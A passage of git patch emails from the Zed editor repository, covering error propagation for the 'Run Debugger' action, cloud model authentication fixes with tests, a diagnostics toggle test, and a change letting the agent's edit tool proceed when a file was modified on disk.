cx.run_until_parked(); + + cx.update_editor(|editor, _, _| { + assert!( + !editor.diagnostics_enabled(), + "diagnostics should remain disabled after settings change" + ); + }); + + cx.update_editor(|editor, window, cx| { + editor.toggle_diagnostics(&actions::ToggleDiagnostics, window, cx); + assert!( + editor.diagnostics_enabled(), + "diagnostics should be re-enabled after second toggle" + ); + }); +} diff --git a/crates/zed/src/zed/quick_action_bar.rs b/crates/zed/src/zed/quick_action_bar.rs index 0f6864e6fa33af..d1ffb58b79244c 100644 --- a/crates/zed/src/zed/quick_action_bar.rs 
+++ b/crates/zed/src/zed/quick_action_bar.rs @@ -120,7 +120,8 @@ impl Render for QuickActionBar { let semantic_highlights_enabled = editor_value.semantic_highlights_enabled(); let code_lens_enabled = editor_value.code_lens_enabled(); let is_full = editor_value.mode().is_full(); - let diagnostics_enabled = editor_value.diagnostics_max_severity != DiagnosticSeverity::Off; + let diagnostics_enabled = editor_value.diagnostics_enabled() + && editor_value.diagnostics_max_severity != DiagnosticSeverity::Off; let supports_inline_diagnostics = editor_value.inline_diagnostics_enabled(); let inline_diagnostics_enabled = editor_value.show_inline_diagnostics(); let git_blame_inline_enabled = editor_value.git_blame_inline_enabled(); From b3b84cc8bf0ee7ae3508fc3fa7f889e26d55d899 Mon Sep 17 00:00:00 2001 From: Tomas Esteves <140959270+tomaseesteves@users.noreply.github.com> Date: Mon, 4 May 2026 07:50:38 +0100 Subject: [PATCH 147/231] Fix "Run Debugger" failing silently when project does not compile (#52439) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit ## Context Previously the Run Debugger gutter arrow would fail silently when the Cargo.toml had garbage lines such as “asdfasdf”. This fix makes it so that the error is detected and bubbles up to the editor, which will notify the user with a toast diagnostic. Closes #46716 ## Fix https://github.com/user-attachments/assets/2e9ac7e9-1306-4607-a762-457131473572 ## How to Review Small PR - focused on four different files: In - `crates/languages/src/rust.rs`: - `target_info_from_abs_path()` - The function signature was changed from `Option<(Option, Arc)>` to `Result, Arc)>>`. A condition was added to ensure that if the Cargo metadata command is unsuccessful, the function returns an error instead of causing an EOF error while deserializing the stdout of the command. - `build_context()` - Added a `?` in `target_info_from_abs_path(path, project_env.as_ref()).await` in order to return the error. 
In - `crates/project/src/task_store.rs`: - `local_task_context_for_location()` and `remote_task_context_for_location()` - The functions signatures were changed from `Task>` to `Task>>` for the purpose of propagating the error. In - `crates/editor/src/editor_tests.rs`: - `build_tasks_context()` - The function signature was changed from `Task>` to `Task>>` . - `toggle_code_actions()` - In case `build_tasks_context()` fails, the functions notifies the error to the user as a Toast notification. In - `crates/editor/src/runnables.rs`: - Since `build_tasks_context()` and `task_store.task_context_for_location()` now return a Result, the callers` spawn_nearest_task() `and `task_context()` were modified. The resulting Result types are transformed to match the expected return types of `TaskContext` and `Task>` Two new tests were added. The first, `target_info_from_abs_path_failed` in `crates/languages/src/rust.rs`, checks if the system properly catches the error. The second, `test_toggle_code_actions_build_tasks_context_error_notifies` in `crates/editor/src/editor_tests.rs`, confirms that the editor triggers the expected error notification. 
## Self-Review Checklist - [X] I've reviewed my own diff for quality, security, and reliability - [ ] Unsafe blocks (if any) have justifying comments - [X] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [X] Tests cover the new/changed behavior - [X] Performance impact has been considered and is acceptable Release Notes: - Fixed the error: Run Debugger failing silently due to invalid Cargo.toml content --------- Co-authored-by: Lukas Wirth --- Cargo.lock | 1 + crates/editor/src/editor.rs | 15 +++-- crates/editor/src/editor_tests.rs | 101 +++++++++++++++++++++++++++++- crates/editor/src/runnables.rs | 7 ++- crates/languages/Cargo.toml | 1 + crates/languages/src/rust.rs | 38 ++++++++--- crates/project/src/task_store.rs | 27 ++++---- 7 files changed, 158 insertions(+), 32 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index 5242481f927a68..383f5e2b9906e2 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -9791,6 +9791,7 @@ dependencies = [ "smol", "snippet", "task", + "tempfile", "terminal", "theme", "tree-sitter", diff --git a/crates/editor/src/editor.rs b/crates/editor/src/editor.rs index dca22e31bffac8..c1741cd6215807 100644 --- a/crates/editor/src/editor.rs +++ b/crates/editor/src/editor.rs @@ -225,7 +225,7 @@ use workspace::{ OpenTerminal, Pane, RestoreOnStartupBehavior, SERIALIZATION_THROTTLE_TIME, SplitDirection, TabBarSettings, Toast, ViewId, Workspace, WorkspaceId, WorkspaceSettings, item::{ItemBufferKind, ItemHandle, PreviewTabsSettings, SaveOptions}, - notifications::{DetachAndPromptErr, NotificationId, NotifyTaskExt}, + notifications::{DetachAndPromptErr, NotificationId, NotifyResultExt, NotifyTaskExt}, searchable::SearchEvent, }; pub use zed_actions::editor::RevealInFileManager; @@ -7055,7 +7055,8 @@ impl Editor { let runnable_task = match deployed_from { Some(CodeActionSource::Indicator(_)) => Task::ready(Ok(Default::default())), _ => { - let mut task_context_task = 
Task::ready(None); + let mut task_context_task = Task::ready(Ok(None)); + let workspace = self.workspace().map(|w| w.downgrade()); if let Some(tasks) = &tasks && let Some(project) = project { @@ -7066,7 +7067,13 @@ impl Editor { cx.spawn_in(window, { let buffer = buffer.clone(); async move |editor, cx| { - let task_context = task_context_task.await; + let task_context = match workspace { + Some(ws) => task_context_task + .await + .notify_workspace_async_err(ws, cx) + .flatten(), + None => task_context_task.await.ok().flatten(), + }; let resolved_tasks = tasks @@ -9744,7 +9751,7 @@ impl Editor { buffer_row: u32, tasks: &Arc, cx: &mut Context, - ) -> Task> { + ) -> Task>> { let position = Point::new(buffer_row, tasks.column); let range_start = buffer.read(cx).anchor_at(position, Bias::Right); let location = Location { diff --git a/crates/editor/src/editor_tests.rs b/crates/editor/src/editor_tests.rs index 7f6ddf9dfa94a3..05fb9425c6a0b0 100644 --- a/crates/editor/src/editor_tests.rs +++ b/crates/editor/src/editor_tests.rs @@ -18,15 +18,16 @@ use buffer_diff::{BufferDiff, DiffHunkSecondaryStatus, DiffHunkStatus, DiffHunkS use collections::HashMap; use futures::{StreamExt, channel::oneshot}; use gpui::{ - BackgroundExecutor, DismissEvent, TestAppContext, UpdateGlobal, VisualTestContext, + BackgroundExecutor, DismissEvent, Task, TestAppContext, UpdateGlobal, VisualTestContext, WindowBounds, WindowOptions, div, }; use indoc::indoc; use language::{ BracketPair, BracketPairConfig, Capability::ReadWrite, - DiagnosticSourceKind, FakeLspAdapter, IndentGuideSettings, LanguageConfig, - LanguageConfigOverride, LanguageMatcher, LanguageName, LanguageQueries, Override, Point, + ContextLocation, ContextProvider, DiagnosticSourceKind, FakeLspAdapter, IndentGuideSettings, + LanguageConfig, LanguageConfigOverride, LanguageMatcher, LanguageName, LanguageQueries, + LanguageToolchainStore, Override, Point, language_settings::{ CompletionSettingsContent, FormatterList, 
LanguageSettingsContent, LspInsertMode, }, @@ -59,6 +60,7 @@ use std::{ iter, sync::atomic::{self, AtomicUsize}, }; +use task::TaskVariables; use test::build_editor_with_project; use unindent::Unindent; use util::{ @@ -26844,6 +26846,99 @@ async fn test_find_enclosing_node_with_task(cx: &mut TestAppContext) { }); } +#[gpui::test] +async fn test_toggle_code_actions_build_tasks_context_error_notifies(cx: &mut TestAppContext) { + init_test(cx, |_| {}); + + struct FailingContextProvider; + impl ContextProvider for FailingContextProvider { + fn build_context( + &self, + _: &TaskVariables, + _: ContextLocation<'_>, + _: Option>, + _: Arc, + _: &mut gpui::App, + ) -> Task> { + Task::ready(Err(anyhow::anyhow!("Task context provider failed"))) + } + } + + let language = Arc::new( + Arc::try_unwrap(rust_lang()) + .unwrap() + .with_context_provider(Some(Arc::new(FailingContextProvider))), + ); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(path!("/a"), json!({ "main.rs": "fn main() {}" })) + .await; + + let project = Project::test(fs, [path!("/a").as_ref()], cx).await; + let language_registry = project.read_with(cx, |project, _| project.languages().clone()); + language_registry.add(language.clone()); + + let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let mut cx = VisualTestContext::from_window(*window, cx); + let workspace = window + .read_with(&mut cx, |mw, _| mw.workspace().clone()) + .unwrap(); + + let worktree_id = workspace.update_in(&mut cx, |workspace, _, cx| { + workspace.project().update(cx, |project, cx| { + project.worktrees(cx).next().unwrap().read(cx).id() + }) + }); + + let editor = workspace + .update_in(&mut cx, |workspace, window, cx| { + workspace.open_path((worktree_id, rel_path("main.rs")), None, true, window, cx) + }) + .await + .unwrap() + .downcast::() + .unwrap(); + + editor.update_in(&mut cx, |editor, window, cx| { + let buffer = editor.buffer().read(cx).as_singleton().unwrap(); + 
buffer.update(cx, |buffer, cx| { + buffer.set_language(Some(language.clone()), cx) + }); + + let snapshot = editor.buffer().read(cx).snapshot(cx); + editor.runnables.insert( + buffer.read(cx).remote_id(), + 0, + buffer.read(cx).version(), + RunnableTasks { + templates: Vec::new(), + offset: snapshot.anchor_before(MultiBufferOffset(0)), + column: 0, + extra_variables: HashMap::default(), + context_range: BufferOffset(0)..BufferOffset(0), + }, + ); + editor.change_selections(SelectionEffects::no_scroll(), window, cx, |s| { + s.select_ranges([Point::new(0, 0)..Point::new(0, 0)]) + }); + + editor.toggle_code_actions( + &ToggleCodeActions { + deployed_from: None, + quick_launch: false, + }, + window, + cx, + ); + }); + + cx.run_until_parked(); + + workspace.update_in(&mut cx, |workspace, _, _| { + assert!(!workspace.notification_ids().is_empty()); + }); +} + #[gpui::test] async fn test_folding_buffers(cx: &mut TestAppContext) { init_test(cx, |_| {}); diff --git a/crates/editor/src/runnables.rs b/crates/editor/src/runnables.rs index 7b0b4d572a5137..956e4dd2e09484 100644 --- a/crates/editor/src/runnables.rs +++ b/crates/editor/src/runnables.rs @@ -310,7 +310,7 @@ impl Editor { let reveal_strategy = action.reveal; let task_context = Self::build_tasks_context(&project, &buffer, buffer_row, &tasks, cx); cx.spawn_in(window, async move |_, cx| { - let context = task_context.await?; + let context = task_context.await.ok().flatten()?; let (task_source_kind, mut resolved_task) = tasks.resolve(&context).next()?; let resolved = &mut resolved_task.resolved; @@ -405,11 +405,12 @@ impl Editor { variables }; - project.update(cx, |project, cx| { + let task = project.update(cx, |project, cx| { project.task_store().update(cx, |task_store, cx| { task_store.task_context_for_location(captured_variables, location, cx) }) - }) + }); + cx.background_spawn(async move { task.await.ok().flatten() }) } pub fn lsp_task_sources( diff --git a/crates/languages/Cargo.toml b/crates/languages/Cargo.toml 
index 4188c97a097a83..8db195ba7de274 100644 --- a/crates/languages/Cargo.toml +++ b/crates/languages/Cargo.toml @@ -67,6 +67,7 @@ util.workspace = true [dev-dependencies] fs = { workspace = true, features = ["test-support"] } pretty_assertions.workspace = true +tempfile = { workspace = true} settings = { workspace = true, features = ["test-support"] } theme = { workspace = true, features = ["test-support"] } tree-sitter-bash.workspace = true diff --git a/crates/languages/src/rust.rs b/crates/languages/src/rust.rs index 56d1f30f3c4692..57d86ea91f342a 100644 --- a/crates/languages/src/rust.rs +++ b/crates/languages/src/rust.rs @@ -898,7 +898,7 @@ impl ContextProvider for RustContextProvider { } if let Some(path) = local_abs_path.as_ref() && let Some((target, manifest_path)) = - target_info_from_abs_path(path, project_env.as_ref()).await + target_info_from_abs_path(path, project_env.as_ref()).await? { if let Some(target) = target { variables.extend(TaskVariables::from_iter([ @@ -1164,24 +1164,31 @@ struct TargetInfo { async fn target_info_from_abs_path( abs_path: &Path, project_env: Option<&HashMap>, -) -> Option<(Option, Arc)> { +) -> Result, Arc)>> { let mut command = util::command::new_command("cargo"); if let Some(envs) = project_env { command.envs(envs); } let output = command - .current_dir(abs_path.parent()?) + .current_dir( + abs_path + .parent() + .ok_or_else(|| anyhow::anyhow!("failed to get parent directory"))?, + ) .arg("metadata") .arg("--no-deps") .arg("--format-version") .arg("1") .output() - .await - .log_err()? 
- .stdout; + .await?; + + if !output.status.success() { + let stderr_msg = String::from_utf8_lossy(&output.stderr); + anyhow::bail!("Cargo metadata failed\n {stderr_msg}"); + } - let metadata: CargoMetadata = serde_json::from_slice(&output).log_err()?; - target_info_from_metadata(metadata, abs_path) + let metadata: CargoMetadata = serde_json::from_slice(&output.stdout)?; + Ok(target_info_from_metadata(metadata, abs_path)) } fn target_info_from_metadata( @@ -2092,6 +2099,21 @@ mod tests { } } + #[test] + fn target_info_from_abs_path_failed() { + let project_root = tempfile::tempdir().unwrap(); + let cargo_toml_path = project_root.path().join("Cargo.toml"); + let src_dir = project_root.path().join("src"); + let main_rs_path = src_dir.join("main.rs"); + + std::fs::create_dir_all(&src_dir).unwrap(); + std::fs::write(&cargo_toml_path, "invalid_toml = {[[{").unwrap(); + std::fs::write(&main_rs_path, "// rust").unwrap(); + + let e = smol::block_on(target_info_from_abs_path(&main_rs_path, None)).unwrap_err(); + assert!(e.to_string().contains("Cargo metadata failed")); + } + #[test] fn test_rust_test_fragment() { #[track_caller] diff --git a/crates/project/src/task_store.rs b/crates/project/src/task_store.rs index 34beb9a8e17275..df5e6bdd0f78d3 100644 --- a/crates/project/src/task_store.rs +++ b/crates/project/src/task_store.rs @@ -145,7 +145,7 @@ impl TaskStore { }; store.task_context_for_location(captured_variables, location, cx) }); - let task_context = context_task.await.unwrap_or_default(); + let task_context = context_task.await?.unwrap_or_default(); Ok(proto::TaskContext { project_env: task_context.project_env.into_iter().collect(), cwd: task_context @@ -207,7 +207,7 @@ impl TaskStore { captured_variables: TaskVariables, location: Location, cx: &mut App, - ) -> Task> { + ) -> Task>> { match self { TaskStore::Functional(state) => match &state.mode { StoreMode::Local { environment, .. 
} => local_task_context_for_location( @@ -233,7 +233,7 @@ impl TaskStore { cx, ), }, - TaskStore::Noop => Task::ready(None), + TaskStore::Noop => Task::ready(Ok(None)), } } @@ -315,7 +315,7 @@ fn local_task_context_for_location( captured_variables: TaskVariables, location: Location, cx: &App, -) -> Task> { +) -> Task>> { let worktree_id = location.buffer.read(cx).file().map(|f| f.worktree_id(cx)); let worktree_abs_path = worktree_id .and_then(|worktree_id| worktree_store.read(cx).worktree_for_id(worktree_id, cx)) @@ -342,16 +342,16 @@ fn local_task_context_for_location( cx, ) }) - .await - .log_err()?; + .await?; + // Remove all custom entries starting with _, as they're not intended for use by the end user. task_variables.sweep(); - Some(TaskContext { + Ok(Some(TaskContext { project_env: project_env.unwrap_or_default(), cwd: worktree_abs_path.map(|p| p.to_path_buf()), task_variables, - }) + })) }) } @@ -364,7 +364,7 @@ fn remote_task_context_for_location( location: Location, toolchain_store: Arc, cx: &mut App, -) -> Task> { +) -> Task>> { cx.spawn(async move |cx| { // We need to gather a client context, as the headless one may lack certain information (e.g. tree-sitter parsing is disabled there, so symbols are not available). 
let mut remote_context = cx @@ -401,8 +401,8 @@ fn remote_task_context_for_location( .map(|(k, v)| (k.to_string(), v)) .collect(), }); - let task_context = context_task.await.log_err()?; - Some(TaskContext { + let task_context = context_task.await?; + Ok(Some(TaskContext { cwd: task_context.cwd.map(PathBuf::from), task_variables: task_context .task_variables @@ -418,7 +418,7 @@ fn remote_task_context_for_location( ) .collect(), project_env: task_context.project_env.into_iter().collect(), - }) + })) }) } @@ -496,8 +496,7 @@ fn combine_task_variables( cx, ) }) - .await - .context("building provider context")?, + .await?, ); } Ok(captured_variables) From bcf97db1a5bfe5dd5156bb91574f1de450a818b3 Mon Sep 17 00:00:00 2001 From: Bennet Bo Fenner Date: Mon, 4 May 2026 09:52:37 +0200 Subject: [PATCH 148/231] cloud: Fix incorrect model getting selected at startup (#55325) Follow up to #54826, after which the fallback model would be selected instead of the cloud model when starting Zed Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - N/A --- Cargo.lock | 3 + crates/language_models/Cargo.toml | 7 + crates/language_models/src/provider/cloud.rs | 239 ++++++++++++++++++- 3 files changed, 246 insertions(+), 3 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index 383f5e2b9906e2..ecd69e00070657 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -9618,6 +9618,7 @@ dependencies = [ "base64 0.22.1", "bedrock", "client", + "clock", "cloud_api_client", "cloud_api_types", "collections", @@ -9627,9 +9628,11 @@ dependencies = [ "copilot_chat", "copilot_ui", "credentials_provider", + "db", "deepseek", "extension", "extension_host", + 
"feature_flags", "fs", "futures 0.3.32", "google_ai", diff --git a/crates/language_models/Cargo.toml b/crates/language_models/Cargo.toml index 8e0216ba6c83c7..7afcbb8aea109b 100644 --- a/crates/language_models/Cargo.toml +++ b/crates/language_models/Cargo.toml @@ -64,5 +64,12 @@ util.workspace = true x_ai = { workspace = true, features = ["schemars"] } [dev-dependencies] +client = { workspace = true, features = ["test-support"] } +clock = { workspace = true, features = ["test-support"] } +db = { workspace = true, features = ["test-support"] } +feature_flags.workspace = true +gpui = { workspace = true, features = ["test-support"] } +http_client = { workspace = true, features = ["test-support"] } language_model = { workspace = true, features = ["test-support"] } pretty_assertions.workspace = true +settings = { workspace = true, features = ["test-support"] } diff --git a/crates/language_models/src/provider/cloud.rs b/crates/language_models/src/provider/cloud.rs index 1c4de9e1afa4d8..0dae88fc3072e3 100644 --- a/crates/language_models/src/provider/cloud.rs +++ b/crates/language_models/src/provider/cloud.rs @@ -4,6 +4,7 @@ use client::{Client, RefreshLlmTokenListener, UserStore, global_llm_token, zed_u use cloud_api_client::LlmApiToken; use cloud_api_types::OrganizationId; use cloud_api_types::Plan; +use futures::FutureExt; use futures::StreamExt; use futures::future::BoxFuture; use gpui::{AnyElement, AnyView, App, AppContext, Context, Entity, Subscription, Task}; @@ -147,11 +148,17 @@ impl State { self.user_store.read(cx).current_user().is_none() } - fn authenticate(&self, cx: &mut Context) -> Task> { + fn sign_in(&self, cx: &mut Context) -> Task> { let client = self.client.clone(); + let mut current_user = self.user_store.read(cx).watch_current_user(); cx.spawn(async move |state, cx| { client.sign_in_with_optional_connect(true, cx).await?; - state.update(cx, |_, cx| cx.notify()) + while current_user.borrow().is_none() { + current_user.next().await; + } + 
state.update(cx, |_, cx| { + cx.notify(); + }) }) } @@ -253,7 +260,11 @@ impl LanguageModelProvider for CloudLanguageModelProvider { } fn authenticate(&self, cx: &mut App) -> Task> { + if self.is_authenticated(cx) { + return Task::ready(Ok(())); + } let mut status = self.state.read(cx).client.status(); + let mut current_user = self.state.read(cx).user_store.read(cx).watch_current_user(); if !status.borrow().is_signing_in() { return Task::ready(Ok(())); } @@ -261,6 +272,23 @@ impl LanguageModelProvider for CloudLanguageModelProvider { while status.borrow().is_signing_in() { status.next().await; } + while current_user.borrow().is_none() { + let current_status = *status.borrow(); + if !matches!( + current_status, + client::Status::Authenticated + | client::Status::Reauthenticated + | client::Status::Connected { .. } + ) { + return Err(AuthenticateError::Other(anyhow::anyhow!( + "sign-in did not complete: {current_status:?}" + ))); + } + futures::select_biased! { + _ = current_user.next().fuse() => {}, + _ = status.next().fuse() => {}, + } + } Ok(()) }) } @@ -387,7 +415,7 @@ impl ConfigurationView { let state = state.clone(); move |_window: &mut Window, cx: &mut App| { state.update(cx, |state, cx| { - state.authenticate(cx).detach_and_log_err(cx); + state.sign_in(cx).detach_and_log_err(cx); }); } }); @@ -419,6 +447,211 @@ impl Render for ConfigurationView { } } +#[cfg(test)] +mod tests { + use super::*; + use client::{Credentials, test::make_get_authenticated_user_response}; + use clock::FakeSystemClock; + use feature_flags::FeatureFlagAppExt as _; + use gpui::TestAppContext; + use http_client::{FakeHttpClient, Method, Response}; + use std::sync::{ + Arc, Mutex, + atomic::{AtomicUsize, Ordering}, + }; + + const TEST_USER_ID: u64 = 42; + + fn init_test(cx: &mut App) -> (Arc, Entity, CloudLanguageModelProvider) { + let settings_store = SettingsStore::test(cx); + cx.set_global(settings_store); + cx.set_global(db::AppDatabase::test_new()); + let app_version = 
AppVersion::global(cx); + release_channel::init_test(app_version, release_channel::ReleaseChannel::Dev, cx); + gpui_tokio::init(cx); + cx.update_flags(false, Vec::new()); + + let client = Client::new( + Arc::new(FakeSystemClock::new()), + FakeHttpClient::with_404_response(), + cx, + ); + let user_store = cx.new(|cx| UserStore::new(client.clone(), cx)); + RefreshLlmTokenListener::register(client.clone(), user_store.clone(), cx); + let provider = CloudLanguageModelProvider::new(user_store.clone(), client.clone(), cx); + + (client, user_store, provider) + } + + fn override_authenticate( + client: &Arc, + authenticate_rx: futures::channel::oneshot::Receiver>, + ) { + let authenticate_rx = Arc::new(Mutex::new(Some(authenticate_rx))); + client.override_authenticate(move |cx| { + let authenticate_rx = authenticate_rx.clone(); + cx.background_spawn(async move { + let authenticate_rx = authenticate_rx + .lock() + .expect("authenticate receiver lock poisoned") + .take() + .expect("authenticate receiver already used"); + authenticate_rx.await? 
+ }) + }); + } + + fn respond_to_authenticated_user_after( + client: &Arc, + authenticated_user_rx: futures::channel::oneshot::Receiver<()>, + ) { + let authenticated_user_rx = Arc::new(Mutex::new(Some(authenticated_user_rx))); + client + .http_client() + .as_fake() + .replace_handler(move |old_handler, request| { + let authenticated_user_rx = authenticated_user_rx.clone(); + async move { + if request.method() == Method::GET && request.uri().path() == "/client/users/me" + { + let authenticated_user_rx = authenticated_user_rx + .lock() + .expect("authenticated user receiver lock poisoned") + .take(); + if let Some(authenticated_user_rx) = authenticated_user_rx { + authenticated_user_rx.await.ok(); + } + + return Ok(Response::builder() + .status(200) + .body( + serde_json::to_string(&make_get_authenticated_user_response( + TEST_USER_ID as i32, + format!("user-{TEST_USER_ID}"), + )) + .expect("failed to serialize authenticated user response") + .into(), + ) + .expect("failed to build authenticated user response")); + } + + old_handler(request).await + } + }); + } + + async fn sign_in_until_authenticating( + client: Arc, + cx: &mut TestAppContext, + ) -> Task> { + let mut status = client.status(); + let sign_in_task = cx.update(|cx| { + cx.spawn({ + let client = client.clone(); + async move |cx| client.sign_in(false, cx).await + }) + }); + + while !status.borrow().is_signing_in() { + status.next().await; + } + + sign_in_task + } + + #[gpui::test] + async fn provider_authenticate_does_not_start_sign_in_when_signed_out(cx: &mut TestAppContext) { + let (client, _user_store, provider) = cx.update(init_test); + let authenticate_calls = Arc::new(AtomicUsize::new(0)); + client.override_authenticate({ + let authenticate_calls = authenticate_calls.clone(); + move |_| { + authenticate_calls.fetch_add(1, Ordering::SeqCst); + Task::ready(Err(anyhow::anyhow!( + "provider authenticate should not start sign-in" + ))) + } + }); + + assert!(!cx.read(|cx| 
provider.is_authenticated(cx))); + assert!(matches!( + *client.status().borrow(), + client::Status::SignedOut + )); + + cx.update(|cx| provider.authenticate(cx)) + .now_or_never() + .expect("authenticate should return immediately when signed out") + .expect("authenticate should not fail when no sign-in is in progress"); + cx.executor().run_until_parked(); + + assert_eq!(authenticate_calls.load(Ordering::SeqCst), 0); + assert!(matches!( + *client.status().borrow(), + client::Status::SignedOut + )); + assert!(!cx.read(|cx| provider.is_authenticated(cx))); + } + + #[gpui::test] + async fn provider_authenticate_waits_for_current_user(cx: &mut TestAppContext) { + let (client, _user_store, provider) = cx.update(init_test); + let (authenticate_tx, authenticate_rx) = futures::channel::oneshot::channel(); + let (authenticated_user_tx, authenticated_user_rx) = futures::channel::oneshot::channel(); + override_authenticate(&client, authenticate_rx); + respond_to_authenticated_user_after(&client, authenticated_user_rx); + + let sign_in_task = sign_in_until_authenticating(client.clone(), cx).await; + let authenticate_task = cx.update(|cx| provider.authenticate(cx)); + authenticate_tx + .send(Ok(Credentials { + user_id: TEST_USER_ID, + access_token: "token".to_string(), + })) + .expect("authenticate receiver dropped"); + + cx.executor().run_until_parked(); + assert!(!cx.read(|cx| provider.is_authenticated(cx))); + + authenticated_user_tx + .send(()) + .expect("authenticated user receiver dropped"); + sign_in_task + .await + .expect("sign-in should complete after user response"); + authenticate_task + .await + .expect("provider authentication should complete after current user is populated"); + assert!(cx.read(|cx| provider.is_authenticated(cx))); + + cx.update(|cx| provider.authenticate(cx)) + .now_or_never() + .expect("already-authenticated provider should authenticate immediately") + .unwrap(); + } + + #[gpui::test] + async fn 
provider_authenticate_returns_error_when_sign_in_fails(cx: &mut TestAppContext) { + let (client, _user_store, provider) = cx.update(init_test); + let (authenticate_tx, authenticate_rx) = futures::channel::oneshot::channel(); + override_authenticate(&client, authenticate_rx); + + let sign_in_task = sign_in_until_authenticating(client.clone(), cx).await; + let authenticate_task = cx.update(|cx| provider.authenticate(cx)); + authenticate_tx + .send(Err(anyhow::anyhow!("test authentication failed"))) + .expect("authenticate receiver dropped"); + + sign_in_task + .await + .expect_err("sign-in should report authentication failure"); + let error = authenticate_task + .await + .expect_err("provider authentication should fail when sign-in fails"); + assert!(error.to_string().contains("AuthenticationError")); + } +} + impl Component for ZedAiConfiguration { fn name() -> &'static str { "AI Configuration Content" From bf871308c4d5dea126f619d3665616662e9d6955 Mon Sep 17 00:00:00 2001 From: Bennet Bo Fenner Date: Mon, 4 May 2026 10:54:20 +0200 Subject: [PATCH 149/231] agent: Do not fail if buffer has changed on disk (#55606) Previously, we would always return an error if the LLM attempted to edit a file that had been modified on disk or by the user in the meantime. However, this often led to unnecessary failures and slowdowns. So, instead of failing every time, we now attempt to resolve a match. If we don't find one, we return an error to inform the LLM that the file has been modified since the last read. 
Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - agent: Do not fail edit tool if file has unsaved changes --- .../src/tools/streaming_edit_file_tool.rs | 138 +++++++++++++++--- 1 file changed, 119 insertions(+), 19 deletions(-) diff --git a/crates/agent/src/tools/streaming_edit_file_tool.rs b/crates/agent/src/tools/streaming_edit_file_tool.rs index 4cd08b2311a2ef..7d229e1f53fa73 100644 --- a/crates/agent/src/tools/streaming_edit_file_tool.rs +++ b/crates/agent/src/tools/streaming_edit_file_tool.rs @@ -603,6 +603,7 @@ pub struct EditSession { mode: StreamingEditFileMode, parser: ToolEditParser, pipeline: EditPipeline, + file_changed_since_last_read: bool, _finalize_diff_guard: Deferred>, } @@ -674,7 +675,7 @@ impl EditSession { .await .map_err(|e| e.to_string())?; - ensure_buffer_saved(&buffer, &abs_path, tool, cx)?; + let file_changed_since_last_read = ensure_buffer_saved(&buffer, &abs_path, tool, cx)?; let diff = cx.new(|cx| Diff::new(buffer.clone(), cx)); event_stream.update_diff(diff.clone()); @@ -708,6 +709,7 @@ impl EditSession { mode, parser: ToolEditParser::default(), pipeline: EditPipeline::new(), + file_changed_since_last_read, _finalize_diff_guard: finalize_diff_guard, }) } @@ -868,7 +870,13 @@ impl EditSession { if !chunk.is_empty() { matcher.push(chunk, None); } - let range = extract_match(matcher.finish(), &self.buffer, edit_index, cx)?; + let range = extract_match( + matcher.finish(), + &self.buffer, + edit_index, + self.file_changed_since_last_read, + cx, + )?; let anchor_range = self .buffer @@ -1045,14 +1053,21 @@ fn extract_match( matches: Vec>, buffer: &Entity, edit_index: &usize, + 
file_changed_since_last_read: bool, cx: &mut AsyncApp, ) -> Result, String> { + let file_changed_since_last_read_message = if file_changed_since_last_read { + " The file has changed on disk since you last read it." + } else { + "" + }; + match matches.len() { 0 => Err(format!( "Could not find matching text for edit at index {}. \ - The old_text did not match any content in the file. \ + The old_text did not match any content in the file.{} \ Please read the file again to get the current content.", - edit_index, + edit_index, file_changed_since_last_read_message, )), 1 => Ok(matches.into_iter().next().unwrap()), _ => { @@ -1099,7 +1114,7 @@ fn ensure_buffer_saved( abs_path: &PathBuf, tool: &StreamingEditFileTool, cx: &mut AsyncApp, -) -> Result<(), String> { +) -> Result { let last_read_mtime = tool .action_log .read_with(cx, |log, _| log.file_read_time(abs_path)); @@ -1115,7 +1130,7 @@ fn ensure_buffer_saved( }); let Ok((current_mtime, is_dirty, has_save_tool, has_restore_tool)) = check_result else { - return Ok(()); + return Ok(false); }; if is_dirty { @@ -1143,15 +1158,13 @@ fn ensure_buffer_saved( return Err(message.to_string()); } - if let (Some(last_read), Some(current)) = (last_read_mtime, current_mtime) { - if current != last_read { - return Err("The file has been modified since you last read it. \ - Please read the file again to get the current state before editing it." 
- .to_string()); - } + if let (Some(last_read), Some(current)) = (last_read_mtime, current_mtime) + && current != last_read + { + return Ok(true); } - Ok(()) + Ok(false) } fn resolve_path( @@ -3316,7 +3329,7 @@ mod tests { } #[gpui::test] - async fn test_streaming_external_modification_detected(cx: &mut TestAppContext) { + async fn test_streaming_external_modification_matching_edit_succeeds(cx: &mut TestAppContext) { let (tool, project, action_log, fs, _thread) = setup_test(cx, json!({"test.txt": "original content"})).await; let read_tool = Arc::new(crate::ReadFileTool::new( @@ -3368,7 +3381,6 @@ mod tests { cx.executor().run_until_parked(); - // Try to edit - should fail because file was modified externally let result = cx .update(|cx| { tool.clone().run( @@ -3386,6 +3398,91 @@ mod tests { cx, ) }) + .await + .unwrap(); + + let StreamingEditFileToolOutput::Success { + new_text, + input_path, + .. + } = result + else { + panic!("expected success"); + }; + + assert_eq!(new_text, "new content"); + assert_eq!(input_path, PathBuf::from("root/test.txt")); + } + + #[gpui::test] + async fn test_streaming_external_modification_mentioned_when_match_fails( + cx: &mut TestAppContext, + ) { + let (tool, project, action_log, fs, _thread) = + setup_test(cx, json!({"test.txt": "original content"})).await; + let read_tool = Arc::new(crate::ReadFileTool::new( + project.clone(), + action_log.clone(), + true, + )); + + cx.update(|cx| { + read_tool.clone().run( + ToolInput::resolved(crate::ReadFileToolInput { + path: "root/test.txt".to_string(), + start_line: None, + 